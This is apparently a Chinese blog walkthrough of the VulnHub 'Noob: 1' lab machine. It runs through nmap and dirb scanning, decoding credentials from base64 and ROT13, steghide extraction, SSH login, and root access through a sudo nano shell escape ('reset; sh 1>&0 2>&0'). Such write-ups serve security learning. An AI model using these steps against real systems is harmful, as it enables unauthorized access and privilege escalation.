vulnhub靶场noob:1

已于 2023-07-18 15:03:58 修改
阅读量251 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 linux 网络安全 系统安全 web安全 密码学 网络攻击模型
于 2023-07-18 10:06:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/131780716
版权

靶机下载地址:Noob: 1 ~ VulnHub

Arp发现主机

arp-scan -l

扫描端口

nmap --min-rate 10000 -p- 192.168.21.132

扫描端口的服务版本号以及操作系统

nmap -sV -sT -sC -O -p21,80 192.168.21.132

可以看到ftp里面有文件,web是php

扫描基础漏洞

nmap --script=vuln -p21,80 192.168.21.132

有scrf(基本没用)

先看一下ftp的文件

ftp 192.168.21.132

不知道密码就不输入(但是必须要登入那就去页面看一下)

下载下来进行分析

有等号大概是base64

echo "Y2hhbXA6cGFzc3dvcmQ="|base64 –decode

ftp是不能登入的

现在看看80端口的东西

拿到的密码试一下,ok成功进入

发现点about us的时候有文件下载,保险起见直接整点目录扫描

​
dirb http://192.168.21.132

此时文件没有权限给个权限就能解压

chmod 777 downloads.rar
unrar e downloads.rar

看一下这三个文件

先看ascii文件

从侧面来说这两图片可能有隐写

发现python文件

steghide extract -sf funny.jpg

steghide extract -sf funny.bmp

密码sudo,才出来的

提示我们要吧文件rotate,那就因该是加解密了,随手一搜CTF在线工具-在线Rot13密码加密|在线Rot13密码解密|Rot13密码算法|Rot13 Cipher (hiencode.com)

这个有点像账号和密码,那应该是ssh的密码了

ssh wtf@192.168.21.132 -p 55077

找到flag

又来一个脚本,看到user和密码

注意#是注释

切换账号

查看权限

发现可以用 nano 编辑器,nano 编辑器允许二进制文件以超级用户身份运行sudo,它不会放弃提升的权限,并可用于访问文件系统、升级或维护特权访问。 nano | GTFOBins

sudo nano

ctrl+r ,Ctrl+x

输入 reset; sh 1>&0 2>&0

会搞定

得到 root 权限,查看flag,在 /root 目录下

himobrinehacken
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
gulp-noob:gulp入门!
05-19
#Gulp Noob! ## gulp入门。 自动化任务 将文件从“ src”传输到“ build”文件夹 启动浏览器同步 观看文件(.html,.css) 自动重新加载浏览器 ##要求 Npm(节点) 古尔普 凉亭 浏览器同步 安装 您将需要npm,...
C_noob:C语言中的Noob东西
02-18
"C_noob:C语言中的Noob东西"这个标题表明我们将探讨的是C语言的基础知识,适合初学者入门。下面将详细阐述C语言的一些核心概念和常用知识点。 首先,C语言以其简洁的语法结构著称,它提供了直接操作内存的能力,这...
vulnhub——Noob:1靶机
Re1_zf的博客
11-27 1493
本次靶机比较简单,没有什么很绕的思路 主要就是工具利用——steghide和base64解码 和一个新的提权方式——nano提权
Vulnhub靶场NOOB: 1
DG_s1mple
03-19 3028
环境准备 下载靶机导入到vmware 攻击机IP地址:192.168.2.16 靶机ip地址:192.168.2.15 信息收集 ftp服务 我们使用nmap扫描一下靶机,看看它开放的服务信息 开放了ftp,http跟ssh这三个服务,我们首先用匿名用户访问一下靶机的ftp 有两个文件,我们下载下来分别查看一下 第一个是base64编码过的,我们把它解码可以得到一串账号密码 第二个文件就没有什么有用的信息了 web服务 我们访问一下他的网站,是一个可登录的页面 除此之外,并没有什么发现 渗透开
vulnhub靶场 noob:1(菜鸟)
dj445566的博客
11-26 580
本文为vulnhub靶场系列noob:1(菜鸟)靶场的做题方法
vulnhub靶场,Node1
kukudeshuo的博客
08-24 454
vulnhub靶场,Node1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/node-1,252/ 攻击机:kali(192.168.109.128) 靶机:Node1(192.168.109.166) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.166 使用nmap扫描查看目标靶机端口开放情况 开放端口:
vulnhub打靶--Noob靶场
maple_leaf
11-21 189
www.vulnhub.com是一个面向信息安全爱好者和专业人士的在线平台,提供了一系列 用于练习渗透测试和漏洞利用的虚拟机(虚拟机镜像)。这些虚拟机镜像通常包含了各种不同类型的漏洞,供用户测试和学习如何发现和利用漏洞以提高网络安全技能。
Java_noob:Java语言中的Noob东西
04-18
1. **Java基础知识**:Java是一种面向对象的编程语言,它的设计目标是具有跨平台性,通过Java虚拟机(JVM)实现“一次编写,到处运行”。学习Java首先需要了解其基本语法,如变量、数据类型、控制结构(如if语句、...
python-noob:菜鸟的列表和搜索示例
04-27
python-noob 简单的学生管理示例 你会学什么 清单 印刷价值 类 直接从班级打印 搜索算法 从列表中删除值 等等.. 特征 列出该死的学生 :school: 添加新学生 :ewe: :Japanese_symbol_for_beginner: 删除顽皮的 :...
flutter-noob:在flutter中实现的调度程序
02-20
【标题】:“Flutter Noob:在Flutter中实现的调度程序” 在Flutter开发中,调度程序(Scheduler)扮演着至关重要的角色。它管理着应用程序中任务的执行顺序和时间,确保UI更新、动画以及其他异步操作得以高效且...
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 669
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 814
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 945
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
[图解]SysML和EA建模住宅安全系统-11-接口块
rolt的专栏
07-06 1003
当然内部块图里面肯定要比这个丰富
【知网CNKI-注册安全分析报告】
07-08 1441
知网作为全国学术界、教育界、出版界、图书情报界的共享平台,打造是国家基础设施,由于收费过高导致很多单位苦知网已经,名符其实的垄断行业,赚的盆满钵满的, 按理技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
最新发布
运维人生
07-10 341
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
等保测评与数据保护:确保敏感信息在数字化转型中的安全传输与存储
A526847的博客
07-07 964
随着数字化转型的加速推进,企业正以前所未有的速度将业务迁移到云端,利用大数据、人工智能、物联网等先进技术提升运营效率和服务质量。然而,这一过程中,敏感信息的传输与存储安全成为了企业面临的重大挑战。信息安全等级保护(简称“等保”)作为保障信息系统安全的重要机制,与数据保护策略紧密结合,共同构筑起一道坚不可摧的安全防线,确保敏感信息在数字化转型中的安全无忧。
了解安全端口
2301_79955948的博客
07-08 1018
涉及系统环境(如操作系统信息、网络架构信息、组网结构等)、应用系统(如应用系统的详细信息、版本信息等)、数据库(如数据库类型、版本、存储方式等)、存储设备(如存储设备类型、版本、存储技术等)、安全设备(如服务器、防火墙、IDS/IPS等)、安全管理和应急响应体系(如安全管理制度、应急预案等)。因此,在进行等保测评前,最好与当地的测评机构或相关部门进行沟通,明确所需的具体材料。:通过等保测评证明企业对数据和客户信息安全的重视,有助于树立良好的企业形象,增强合作伙伴及公众的信任度,促进业务的持续健康发展。
CobaltStrike的内网安全
8888的博客
07-05 1246
介绍:CobaltStrike分为服务端和客户端,一般我们将服务端放在kali,客户端可以在物理机上面,或者虚拟机都可以启动服务端,首先创建一个监听(注意,这里要关闭kali的Apache服务,要不然端口占用创建监听不成功)payload选择Beacon HTTP ,HTTP Hosts选择服务器的IP点击save接着我们用CS生成一个payload(Windows exe),使得我靶机上线:Lisrener选择我们创建的监听服务,点击Launch。
blender好用的免费教程
04-04
1. Blender基础教程(官方)- Blender官方提供的基础教程,适合初学者。 2. Blender Guru - Andrew Price是Blender社区中最有名的教程制作者之一,他的教程涵盖了从基础到高级的各种主题。 3. CG Cookie - CG ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值